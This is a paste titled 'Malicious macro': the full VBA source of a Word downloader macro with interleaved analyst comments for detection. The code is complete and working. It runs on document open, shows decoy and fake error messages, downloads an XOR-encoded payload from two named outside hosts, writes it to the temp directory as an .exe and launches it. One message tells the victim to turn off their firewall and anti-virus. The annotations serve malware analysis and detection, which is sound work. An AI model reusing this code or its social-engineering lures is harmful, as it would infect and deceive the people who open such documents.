dynamoo

Malicious macro

Mar 28th, 2017
text 4.45 KB | None | 0 0
  ' Analyst note: Win32 API imports for this document module. Each API is bound to a
  ' meaningless alias, so the real API names appear only inside these Declare strings:
  '   wefjwekgn   -> shell32!ShellExecuteA      (process launch)
  '   uwhdhjwgf   -> kernel32!GetTempPathA      (locate the temp directory)
  '   qhduhfe     -> kernel32!GetTempFileNameA  (reserve a temp file name)
  '   jiwoiefjweg -> urlmon!URLDownloadToFileA  (HTTP download to disk)
  ' Static triage can key on a macro that declares URLDownloadToFileA together with
  ' ShellExecuteA; the alias names themselves are arbitrary and not a stable indicator.
  1. Rem Attribute VBA_ModuleType=VBADocumentModule
  2. Option VBASupport 1
  ' The same four imports are declared twice: a PtrSafe set for 64-bit VBA7 hosts and
  ' a plain set for everything else.
  3. #If VBA7 And Win64 Then
  4. Private Declare PtrSafe Function wefjwekgn Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal Operation As String, ByVal Filename As String, Optional ByVal Parameters As String, Optional ByVal Directory As String, Optional ByVal WindowStyle As Long = vbMaximizedFocus) As LongLong
  5. Private Declare PtrSafe Function uwhdhjwgf Lib "kernel32" Alias "GetTempPathA" (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long
  6. Private Declare PtrSafe Function qhduhfe Lib "kernel32" Alias "GetTempFileNameA" (ByVal lpszPath As String, ByVal lpPrefixString As String, ByVal wUnique As Long, ByVal lpTempFileName As String) As Long
  7. Private Declare PtrSafe Function jiwoiefjweg Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
  8. #Else
  9. Private Declare Function wefjwekgn Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal Operation As String, ByVal Filename As String, Optional ByVal Parameters As String, Optional ByVal Directory As String, Optional ByVal WindowStyle As Long = vbMaximizedFocus) As Long
  10. Private Declare Function uwhdhjwgf Lib "kernel32" Alias "GetTempPathA" (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long
  11. Private Declare Function qhduhfe Lib "kernel32" Alias "GetTempFileNameA" (ByVal lpszPath As String, ByVal lpPrefixString As String, ByVal wUnique As Long, ByVal lpTempFileName As String) As Long
  12. Private Declare Function jiwoiefjweg Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
  13. #End If
  14.  
  15.  
  16.  
  ' Analyst note: Document_Open is Word's auto-run event handler, so this body executes
  ' as soon as the document is opened with macros enabled. Flow, as visible below:
  '   1. replace the document text with a decoy status message,
  '   2. download an encoded blob to a temp file (primary URL, then a fallback URL),
  '   3. XOR-decode the blob in memory (wjhhuuuufdp) and write it back out as an .exe,
  '   4. launch the .exe via explorer.exe and show a fake error dialog.
  ' Detection-relevant behaviour: an Office process calling URLDownloadToFileA, writing
  ' an .exe under the temp directory, and invoking ShellExecuteA on explorer.exe.
  17. Sub Document_Open()
  18.  
  ' ujfiejgirg   = path of the temp file (later the dropped .exe)
  ' wefnwiouirh  = return code of the download call
  ' mewiheij     = size on disk of the downloaded file
  ' wkjiegjbnffd = VBA file handle number
  ' pfkjwigjkd   = byte buffer holding the downloaded, then decoded, content
  19. Dim ujfiejgirg As String
  20. Dim wefnwiouirh As Long
  21. Dim mewiheij As Long
  22. Dim wkjiegjbnffd As Integer
  23. Dim pfkjwigjkd() As Byte
  24.  
  ' Receives the ShellExecuteA return value; its width follows the host bitness.
  25. #If Win64 Then
  26. Dim wjiejeiogif As LongLong
  27. #Else
  28. Dim wjiejeiogif As Long
  29. #End If
  30.  
  ' Decoy: wipe whatever lure text the document shipped with and restyle the page.
  31. ActiveDocument.Content.Delete
  32. ActiveDocument.PageSetup.LeftMargin = 240
  33. ActiveDocument.PageSetup.TopMargin = 100
  34.  
  ' myRange is never declared with Dim (the module has no Option Explicit).
  35. Set myRange = ActiveDocument.Content
  36.  
  37. With myRange.Font
  38. .Name = "Verdana"
  39. .Size = 14
  40. End With
  41.  
  ' Social-engineering text shown to the user while the download runs.
  42. ActiveDocument.Range.Text = "Check SSL certificate." & vbLf & " Please wait..."
  43.  
  ' Yield to the message loop, presumably so the decoy text is painted before the
  ' blocking download starts.
  44. DoEvents
  45. DoEvents
  46. DoEvents
  47. DoEvents
  48.  
  ' Obtain a temp file path, then fetch the primary URL into it. The URL ends in .gif,
  ' but the content is treated below as an encoded binary, not as an image.
  49. ujfiejgirg = iwjhufuebnubg
  50. wefnwiouirh = jiwoiefjweg(0, "http://galaxytown.net/store/read.gif", ujfiejgirg, 0, 0)
  51. mewiheij = FileLen(ujfiejgirg)
  52.  
  ' URLDownloadToFile returns 0 (S_OK) on success, so this branch runs only when the
  ' first download reported an error AND the file is smaller than 472819 bytes; it
  ' then retries against the second URL into the same path.
  53. If wefnwiouirh <> 0 And mewiheij < 472819 Then
  54. wefnwiouirh = jiwoiefjweg(0, "http://www.effeelle.eu/img/logo.gif", ujfiejgirg, 0, 0)
  55. mewiheij = FileLen(ujfiejgirg)
  56. End If
  57.  
  58.  
  ' Minimum-size gate (423621 bytes, a different threshold from the one above). On
  ' failure the macro clears the page and shows a dialog telling the user to disable
  ' their firewall and anti-virus, which is itself a strong phishing indicator.
  59. If mewiheij < 423621 Then
  60. ActiveDocument.Content.Delete
  61. MsgBox "No internet access. Turn off any firewall or anti-virus software and try again.", vbCritical, "Error"
  62. Exit Sub
  63. End If
  64.  
  ' Read the whole downloaded file into the byte buffer.
  65. wkjiegjbnffd = FreeFile
  66. Open ujfiejgirg For Binary As #wkjiegjbnffd
  67. ReDim pfkjwigjkd(0 To LOF(wkjiegjbnffd) - 1)
  68. Get #wkjiegjbnffd, , pfkjwigjkd()
  69. Close #wkjiegjbnffd
  70.  
  ' Decode in place; the XOR key is carried inside the download itself.
  71. Call wjhhuuuufdp(pfkjwigjkd())
  72.  
  ' Swap the last three characters of the temp path for "exe" (GetTempFileName names
  ' normally end in "tmp" - confirm on the analysed host), giving a second file next
  ' to the original temp file.
  73. ujfiejgirg = Left(ujfiejgirg, Len(ujfiejgirg) - 3)
  74. ujfiejgirg = ujfiejgirg & "exe"
  75.  
  ' Write the decoded buffer to the new .exe path.
  76. wkjiegjbnffd = FreeFile
  77. Open ujfiejgirg For Binary As #wkjiegjbnffd
  78. Put #wkjiegjbnffd, , pfkjwigjkd()
  79. Close #wkjiegjbnffd
  80.  
  81.  
  ' ShellExecuteA("Open", "explorer.exe", <dropped exe path>): the payload is handed to
  ' explorer.exe as a parameter rather than started directly. NOTE(review): this likely
  ' keeps the payload from being a direct child of the Office process, so process-tree
  ' rules should also look for explorer.exe command lines carrying a temp-directory
  ' executable path.
  82. wjiejeiogif = wefjwekgn(0, "Open", "explorer.exe", ujfiejgirg)
  83.  
  ' Cover story: blank the document and claim the file was corrupt.
  84. ActiveDocument.Content.Delete
  85. MsgBox "The file is corrupted and cannot be opened", vbCritical, "Error"
  86.  
  87. End Sub
  88.  
  89.  
  ' Analyst note: returns the full path of a new temp file, or an empty string when
  ' either API call fails (the return value is simply never assigned in that case).
  ' Uses the aliased GetTempPathA (uwhdhjwgf) and GetTempFileNameA (qhduhfe).
  90. Public Function iwjhufuebnubg() As String
  ' Fixed-length buffers for the temp directory and the generated file name.
  91. Dim djfie As String * 512
  92. Dim pwifu As String * 576
  93. Dim dwuf As Long
  94. Dim wefkg As String
  ' GetTempPathA: the return value is the length of the path written to djfie.
  95. dwuf = uwhdhjwgf(512, djfie)
  ' Proceed only if a path was returned and it fitted in the 512-byte buffer.
  96. If (dwuf > 0 And dwuf < 512) Then
  ' GetTempFileNameA with wUnique = 0: per the documented API behaviour the system
  ' picks a unique name and creates an empty file at that path.
  97. dwuf = qhduhfe(djfie, 0, 0, pwifu)
  98. If dwuf <> 0 Then
  ' Trim the fixed-length buffer at the first NUL to get the usable path string.
  99. wefkg = Left$(pwifu, InStr(pwifu, vbNullChar) - 1)
  100. End If
  101. iwjhufuebnubg = wefkg
  102. End If
  103. End Function
  104.  
  ' Analyst note: in-place decoder for the downloaded blob (array passed by reference).
  ' Layout implied by the indices used below:
  '   bytes 0-9     : not read by this routine
  '   bytes 10-265  : 256-byte XOR key
  '   bytes 266 ... : encoded payload, decoded with the key repeating every 256 bytes
  ' Because the key travels with the payload, the content on the wire has no fixed
  ' plaintext header to match; behavioural detection of the macro is more reliable
  ' than content signatures on the download.
  105. Public Sub wjhhuuuufdp(pfkjwigjkd() As Byte)
  ' dfety = loop index, bvjwi = input length, dvywi = key buffer,
  ' wdals = key buffer element count, dwiqh = current key offset.
  ' wbdys is declared but not used in this routine.
  106. Dim dfety As Long
  107. Dim bvjwi As Long
  108. Dim wbdys As Long
  109. Dim dvywi(256) As Byte
  110. Dim wdals As Long
  111. Dim dwiqh As Long
  112.  
  113.  
  114. bvjwi = UBound(pfkjwigjkd) + 1
  115.  
  ' Copy the 256 key bytes out of the input (offsets 10..265) into dvywi(0..255).
  116. For dfety = 10 To 265
  117. dvywi(dfety - 10) = pfkjwigjkd(dfety)
  118. Next
  119.  
  ' dvywi(256) has indices 0..256 under the default Option Base, so wdals is 257 and
  ' the reset below fires at offset 256, i.e. only key bytes 0..255 are ever used.
  120. wdals = UBound(dvywi) + 1
  121.  
  122. dwiqh = 0
  ' XOR each encoded byte with the rolling key and store it 266 positions earlier,
  ' so the decoded output starts at index 0. The write index always trails the read
  ' index, so unread input is never overwritten.
  123. For dfety = 266 To (bvjwi - 267)
  124. pfkjwigjkd(dfety - 266) = pfkjwigjkd(dfety) Xor dvywi(dwiqh)
  125. dwiqh = dwiqh + 1
  126.  
  127. If dwiqh = (wdals - 1) Then
  128. dwiqh = 0
  129. End If
  130. Next
  131.  
  ' Trim the array to upper bound bvjwi - 267. The loop above writes only indices
  ' 0..bvjwi - 533, so the retained array is 266 bytes longer than the decoded region;
  ' those trailing bytes are left over from the input rather than produced by the
  ' decode. Keep this in mind when matching the dropped file's size or hash.
  132. ReDim Preserve pfkjwigjkd(bvjwi - 267)
  133.  
  134. End Sub